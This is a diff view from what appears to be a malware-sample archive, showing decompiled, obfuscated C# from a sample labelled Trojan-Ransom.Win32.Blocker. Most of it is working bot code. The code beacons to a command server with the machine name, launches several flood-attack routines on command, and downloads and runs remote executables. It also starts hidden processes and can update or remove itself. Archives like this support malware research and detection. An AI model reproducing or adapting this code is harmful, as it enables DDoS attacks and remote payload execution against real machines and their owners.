internal class c9988649815b3bee89b89ce1f70add59a
{
public bool c3bb3892b091698f44f5eef2d60b4fdce;
public bool c7f5f1982284129a8f8b31dccfdfd611d = true;
public bool cee85921584204e889e611a07cd58ecbe;
public bool c2792dd7fd2c0d285a78c0e499a018122 = true;
public bool c42ca1abba7c3eb2e77675d1b04109855 = true;
public bool c9a92257b6e60ece44ea61306d2e6b428 = true;
public bool c16ce46a32b47b87a25752f953db57737 = true;
public bool c425aa3d25ab0dba5645b56912ea4c4d2 = true;
public bool c30a3cccc21356bfeddb6e1403a422049 = true;
public bool cc4e05926d74457f5cadf3b3016466128 = true;
public bool c95571c46a38d4a535991b6bdfeb2551e = true;
public bool cf18b158d9e992664f5c41c68fd861625 = true;
public bool cee81352979639fa55df6e014bfaad5e8 = true;
public bool c866ddb199211ac10f9ce85f741267ca5 = true;
public bool cbccd1ae7ab19514f4d7ff49c6066ef54 = true;
public string[] c32d06ec84131a62668e3e18e23c950ae = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(518),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(541)
};
public string[] cce2f2518258cebbe2cbf0e7534398ba2 = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(564),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(605)
};
public string ce6b1c08295456824d707adffcd771c22 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(656);
public string cdd86f79582ee69b3331f0a01a8458c64 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(725);
public string c053a2ccab85d88a8bb0dd1fb41fedf35 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(732);
public string cf878f08181d5af12c924fb92b523534b = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(769);
public int cddb71d8bcf007ee24cca0a5fc8c9f9d1 = 1;
public bool ca20a8f4602f269ed2947b3a5ca5860a2 = true;
public string c5c0d142f43b2ed4000991109cbc0575f = string.Empty;
public string c08c5101a594b5e3a22d4e523b7baa2b1 = Environment.MachineName;
public string c8d4d9680af49d6d5dcc86b05695287f2 = string.Empty;
public string[] c712648a24a265f1e1bc00c1dfbecbd3e = new string[2];
public c9988649815b3bee89b89ce1f70add59a()
{
this.c712648a24a265f1e1bc00c1dfbecbd3e[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + this.c32d06ec84131a62668e3e18e23c950ae[0];
this.c712648a24a265f1e1bc00c1dfbecbd3e[1] = Environment.GetFolderPath(Environment.SpecialFolder.System) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + this.c32d06ec84131a62668e3e18e23c950ae[1];
}
}
}

282
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9b81b1a3e4ee51d08f5de2448e459036.cs
View File

@ -1,282 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
namespace A
{
internal class c9b81b1a3e4ee51d08f5de2448e459036
{
private string c749d615fce46a65e549ecd0269efb309 = string.Empty;
public void ccca4f7e07f327977d582f4cecb7af4cd()
{
this.c70c0917b5d671ac9ae9d4e7f861b66d0();
new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
}
private void c70c0917b5d671ac9ae9d4e7f861b66d0()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
while (true)
{
try
{
string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (str.Length > 0)
{
if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
break;
Environment.Exit(-1);
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private void ca33aa6acdace65e5414a966dd1dc03ae()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
while (true)
{
try
{
string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
{
if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
{
this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
}
}
else
{
try
{
c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
}
catch
{
}
try
{
c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
}
catch
{
}
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
}
catch
{
}
try
{
cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
}
catch
{
}
this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private string c372676659fe6f48f27b1ad11ccb40951(
string cf7d7ab02f04f36e1e7781d49924e7769,
string c2cbf7d2e1f35e8102d156c340d5f99cb)
{
ServicePointManager.Expect100Continue = false;
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
httpWebRequest.ContentLength = (long) bytes.Length;
Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
}
private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
{
string[] strArray = new string[0];
try
{
strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
}
catch
{
}
string key;
if ((key = strArray[0]) == null)
return;
// ISSUE: reference to a compiler-generated field
if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
{
// ISSUE: reference to a compiler-generated field
c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary<string, int>(8)
{
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
0
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
1
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
2
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
3
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
4
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
5
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
6
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
7
}
};
}
int num;
// ISSUE: reference to a compiler-generated field
// ISSUE: explicit non-virtual call
if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
return;
switch (num)
{
case 0:
try
{
c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
break;
}
catch
{
break;
}
case 1:
try
{
c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
break;
}
catch
{
break;
}
case 2:
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
break;
}
catch
{
break;
}
case 3:
try
{
cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
break;
}
catch
{
break;
}
case 4:
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
}
}.Start();
break;
}
catch
{
break;
}
case 5:
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
break;
}
catch
{
break;
}
case 6:
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
break;
case 7:
if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
break;
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
break;
}
}
}
}

Some files were not shown because too many files have changed in this diff Show More